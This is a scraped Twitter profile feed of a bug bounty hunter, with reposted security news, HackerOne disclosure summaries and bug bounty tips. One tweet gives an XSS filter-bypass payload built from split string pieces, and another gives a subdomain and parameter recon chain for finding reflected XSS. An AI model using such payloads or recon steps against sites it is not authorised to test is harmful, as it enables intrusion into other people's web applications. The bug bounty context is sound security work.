Ashish Rao (@ashishraosahab6) 's Twitter Profile
Ashish Rao

@ashishraosahab6

| Cyber Security |
Bug Hunter | #blackbox | #greybox | #whitebox |
github.com/Ashish-bot |

ID: 2897697889

calendar_today12-11-2014 15:23:23

4,4K Tweet

111 Takipçi

284 Takip Edilen

Nicolas Krassas (@dinosn) 's Twitter Profile Photo

CVE-2024-40725 & CVE-2024-40898: Apache HTTP Server Flaws Put Millions of Websites at Risk securityonline.info/cve-2024-40725…

RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

𝗫𝗦𝗦 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱: javascript​:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><cybertix onbeforetoggle​="+a+b+c+" popover id=x>CYBERTIX</cybertix>") #bugbountytips by Cybertix

𝗫𝗦𝗦 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱:
                                        
javascript​:var a="ale";var b="rt";var c="()";decodeURI("&lt;button popovertarget=x&gt;Click me&lt;/button&gt;&lt;cybertix onbeforetoggle​="+a+b+c+" popover id=x&gt;CYBERTIX&lt;/cybertix&gt;")

#bugbountytips by <a href="/thecybertix/">Cybertix</a>
𝕏 Bug Bounty Writeups 𝕏 (@bountywriteups) 's Twitter Profile Photo

🚀🚀 How to find RXSS in 5 minutes 🚀🚀 🧾 Credit - Ahmad Marzouk 1) subfinder -d target.com -all -o targets.txt *use subfinder with API Keys to extract a lot subdomains* 2) paramspider -l targets.txt 3) cat *.txt | kxss 4) Use this Payload to Bypass case

Today Cyber News (@todaycybernews) 's Twitter Profile Photo

A major security vulnerability in the most recent version of WhatsApp for Windows lets hackers send attachments that contain PHP and Python scripts that execute quietly when the person who received them opens them. Read More - hackingblogs.com/indepth-guide-… #bugbounty #cybersecurity

A major security vulnerability in the most recent version of <a href="/WhatsApp/">WhatsApp</a> for Windows lets hackers send attachments that contain PHP and Python scripts that execute quietly when the person who received them opens them.

Read More - hackingblogs.com/indepth-guide-…

#bugbounty #cybersecurity
Intigriti (@intigriti) 's Twitter Profile Photo

Want a comprehensive guide on how to exploit SQL injections? 🤑 Check out Advanced SQL Injection Techniques by N$! 😎 A Gitbook covering some of the most common and advanced SQL injections that may be present on your target! 👇 buff.ly/3AfzUUz

H1 Disclosed - Public Disclosures (@h1disclosed) 's Twitter Profile Photo

⚡ Content-Security Policy bypass with File Uploads 👨🏻‍💻 gronke ➟ Rocket.Chat 🟥 High 💰 None 🔗 hackerone.com/reports/1380157 #bugbounty #bugbountytips #cybersecurity #infosec

⚡ Content-Security Policy bypass with File Uploads 
👨🏻‍💻 gronke ➟ Rocket.Chat 
🟥 High
💰 None
🔗 hackerone.com/reports/1380157
#bugbounty #bugbountytips #cybersecurity #infosec
H1 Disclosed - Public Disclosures (@h1disclosed) 's Twitter Profile Photo

⚡ moderate: Apache HTTP Server: mod_rewrite proxy handler substitution (CVE-2024-39573) CWE-20 Impr... 👨🏻‍💻 orange ➟ Internet Bug Bounty 🟧 Medium 💰 $2,600 🔗 hackerone.com/reports/2585374 #bugbounty #bugbountytips #cybersecurity #infosec

⚡ moderate: Apache HTTP Server: mod_rewrite proxy handler substitution (CVE-2024-39573) CWE-20 Impr... 
👨🏻‍💻 orange ➟ Internet Bug Bounty 
🟧 Medium
💰 $2,600
🔗 hackerone.com/reports/2585374
#bugbounty #bugbountytips #cybersecurity #infosec
H1 Disclosed - Public Disclosures (@h1disclosed) 's Twitter Profile Photo

⚡ Course Registration Form Allowing an attacker to dump all the candidate name who had enrolled for... 👨🏻‍💻 steveflex ➟ U.S. Dept Of Defense 🟥 High 💰 None 🔗 hackerone.com/reports/1100383 #bugbounty #bugbountytips #cybersecurity #infosec

⚡ Course Registration Form Allowing an attacker to dump all the candidate name who had enrolled for... 
👨🏻‍💻 steveflex ➟ U.S. Dept Of Defense 
🟥 High
💰 None
🔗 hackerone.com/reports/1100383
#bugbounty #bugbountytips #cybersecurity #infosec
H1 Disclosed - Public Disclosures (@h1disclosed) 's Twitter Profile Photo

⚡ Blind Stored XSS on the internal host - █████████████ 👨🏻‍💻 Eugene Yakovchuk ➟ U.S. Dept Of Defense 🟥 High 💰 None 🔗 hackerone.com/reports/923912 #bugbounty #bugbountytips #cybersecurity #infosec

⚡ Blind Stored XSS on the internal host - █████████████ 
👨🏻‍💻 <a href="/h1_sp1d3r/">Eugene Yakovchuk</a> ➟ U.S. Dept Of Defense 
🟥 High
💰 None
🔗 hackerone.com/reports/923912
#bugbounty #bugbountytips #cybersecurity #infosec
H1 Disclosed - Public Disclosures (@h1disclosed) 's Twitter Profile Photo

⚡ Unauthenticated arbitrary file upload on the https://█████/ (█████████) 👨🏻‍💻 Eugene Yakovchuk ➟ U.S. Dept Of Defense 🟥 High 💰 None 🔗 hackerone.com/reports/698789 #bugbounty #bugbountytips #cybersecurity #infosec

⚡ Unauthenticated arbitrary file upload on the https://█████/ (█████████) 
👨🏻‍💻 <a href="/h1_sp1d3r/">Eugene Yakovchuk</a> ➟ U.S. Dept Of Defense 
🟥 High
💰 None
🔗 hackerone.com/reports/698789
#bugbounty #bugbountytips #cybersecurity #infosec
Nikhil Mittal (@nikhil_mitt) 's Twitter Profile Photo

We had a blast at DEF CON ! Met 2000+ visitors on our booth. Met many of our existing students and customers and met many new ones. We sponsored the Adversary Village and the RedTeamVillage. We also had the largest collection of mugs at DEF CON 32 :) After the conference, we

We had a blast at <a href="/defcon/">DEF CON</a> ! Met 2000+ visitors on our booth. Met many of our existing students and customers and met many new ones.

We sponsored the <a href="/AdversaryVillag/">Adversary Village</a>  and the <a href="/RedTeamVillage_/">RedTeamVillage</a>. We also had the largest collection of mugs at DEF CON 32 :)

After the conference, we
H1 Disclosed - Public Disclosures (@h1disclosed) 's Twitter Profile Photo

⚡ Local Privilege Escalation via DLL Search-Order Hijacking with Cyber Protection Agent - tibxread.... 👨🏻‍💻 mmg ➟ Acronis 🟧 Medium 💰 None 🔗 hackerone.com/reports/963103 #bugbounty #bugbountytips #cybersecurity #infosec

⚡ Local Privilege Escalation via DLL Search-Order Hijacking with Cyber Protection Agent - tibxread.... 
👨🏻‍💻 mmg ➟ Acronis 
🟧 Medium
💰 None
🔗 hackerone.com/reports/963103
#bugbounty #bugbountytips #cybersecurity #infosec